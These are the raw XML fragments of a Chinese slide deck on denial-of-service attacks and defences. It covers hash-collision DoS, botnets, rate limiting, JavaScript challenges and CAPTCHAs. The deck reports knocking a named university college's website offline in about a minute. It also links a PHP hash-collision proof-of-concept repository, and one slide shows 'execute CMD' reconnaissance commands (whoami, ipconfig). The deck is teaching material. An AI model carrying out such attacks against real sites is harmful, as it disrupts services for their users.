                                          <p:spTgt spid="3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P build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="395" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="394" grpId="2"/>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xfrm>
            <a:off x="952500" y="757237"/>
            <a:ext cx="11099800" cy="2159001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>拒绝服务漏洞及防范</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="398" name="Shape 398"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="606424" y="4520405"/>
            <a:ext cx="12196765"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拒绝服务攻击(Denial of service)是利用合理的请求造成资源过载，导致服务不能用。DDOS 又称为分布式拒绝服务，全称是Distributed Denial of Service。</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xfrm>
            <a:off x="3746500" y="2130722"/>
            <a:ext cx="4699845" cy="961729"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="414780">
              <a:defRPr sz="4000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>一个真实的DOS案例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="401" name="Shape 401"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3244849" y="3727449"/>
            <a:ext cx="6515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如何一分钟瘫痪学校网站服务？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="402" name="Shape 402"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1276145" y="5099049"/>
            <a:ext cx="104525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找到一台存在PHP Hash Collision的服务器就够了！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="403" name="Shape 403"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2493898" y="6470650"/>
            <a:ext cx="801700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http://zhuoyuezs.hdu.edu.cn/ 卓越学院</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4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4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2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="403" grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="402" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="400" grpId="1"/>
    </p:bldLst>
  </p:timing>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="336549"/>
            <a:ext cx="10287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原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="406" name="Shape 406"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="1504950"/>
            <a:ext cx="11379200" cy="233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latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>哈希表碰撞攻击就是通过精心构造数据，使得所有数据全部碰撞，人为将哈希表变成一个退化的单链表，此时哈希表各种操作的时间均提升了一个数量级，因此会消耗大量CPU资源，导致系统无法快速响应请求，从而达到拒绝服务攻击（DoS）的目的。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="407" name="image46.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2647950" y="4762500"/>
            <a:ext cx="7988301" cy="3543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05"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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40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 grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="407"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="2500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="407"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="2500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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6" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="407" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="405" grpId="1"/>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1807069" y="8413749"/>
            <a:ext cx="939066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latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>POC：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                </a:uFill>
                <a:hlinkClick r:id="rId2" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://github.com/sysorem/PHP-Hash-Collision-POC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="410" name="image5.tif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="428132" y="2060597"/>
            <a:ext cx="11208736" cy="1303106"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="411" name="image6.tif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3072127" y="4617847"/>
            <a:ext cx="6289046" cy="2899007"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="412" name="Shape 412"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5245099" y="69849"/>
            <a:ext cx="1943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实验效果</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="Shape 413"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="435813" y="1286596"/>
            <a:ext cx="10756342"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atin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>一台普通PC攻击持续1分钟左右，服务器开始无法提供正常Web服务</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="414" name="Shape 414"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="435812" y="3685974"/>
            <a:ext cx="50927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atin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>第三方网站连通性测试返回失败</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="2500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="41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4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32" presetID="4" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="410"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="box(out)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="410"/>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lt" backwards="0">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="20" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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4" grpId="5" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="411"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="box(out)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="411"/>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6" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt" backwards="0">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="29" fill="hold"/>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9" grpId="6"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="412" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="414" grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="413" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="410" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="411" grpId="5"/>
    </p:bld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6" name="image47.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1060450" y="2119311"/>
            <a:ext cx="10882314" cy="5513389"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417" name="Shape 417"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1791970" y="8121650"/>
            <a:ext cx="882396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据传阿里能抗DDOS的住的流量为600+Gps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="418" name="Shape 418"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5664276" y="1092200"/>
            <a:ext cx="1409548"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DDOS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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4" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="416"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="box(in)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="416"/>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lt" backwards="0">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" fill="hold"/>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2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="417" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="418"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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="896321" y="985836"/>
            <a:ext cx="206974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执行CMD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="60" name="image1.tif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2297939" y="2794519"/>
            <a:ext cx="7875522" cy="1877220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61" name="image2.tif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2235200" y="5588000"/>
            <a:ext cx="8224057" cy="3456788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Shape 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2204116" y="2109786"/>
            <a:ext cx="168935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whoami</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Shape 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2280240" y="4806018"/>
            <a:ext cx="17657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ipconfig</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="64" name="image4.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5993605" y="937417"/>
            <a:ext cx="1017589" cy="3508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62"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="10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60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1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2" grpId="4" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="10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61"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="1500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="61"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="1500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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 grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="62" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="63" grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="61" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="59" grpId="1"/>
    </p:bldLst>
  </p:timing>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="2964656"/>
            <a:ext cx="12088815" cy="3822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Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>分布式拒绝攻击，将正常的请求放大若干倍，通过若干个网络节点同时发起攻击，以达成规模效应。这些节点往往是黑客们所控制的“肉鸡”，数量达到一定的规模后，就形成了一个“僵尸网络”。大型的僵尸网络甚至达到数万台，数十万台的规模，一旦发起攻击，几乎不可阻挡。</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420"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(up)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7"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0" grpId="1"/>
    </p:bldLst>
  </p:timing>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="726280" y="2965052"/>
            <a:ext cx="11552240"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最常见的针对DDOS的防御措施是在应用层中针对每一个“客户端”做一个请求频率的限制。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="423" name="Shape 423"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5530850" y="1307305"/>
            <a:ext cx="19431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防御措施</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="424" name="Shape 424"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550067" y="4781946"/>
            <a:ext cx="11904666"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让客户端解析一段javascript，并给出正确的运行结果，因为大部分自动话的脚本都是直接构造http包完成的，并非在一个浏览器中发起的请求</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23"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="10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422"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(right)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="42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6" presetID="18" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="16" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="424"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="strips(downRight)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="17"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3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="422" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="423" grpId="1"/>
    </p:bldLst>
  </p:timing>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6" name="image48.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2166936" y="1360487"/>
            <a:ext cx="8669340" cy="5792788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="427" name="Shape 427"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3243262" y="6230143"/>
            <a:ext cx="6515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使用验证码，可以识别人与机器</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6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="42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23" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="427"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="427"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="4*#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
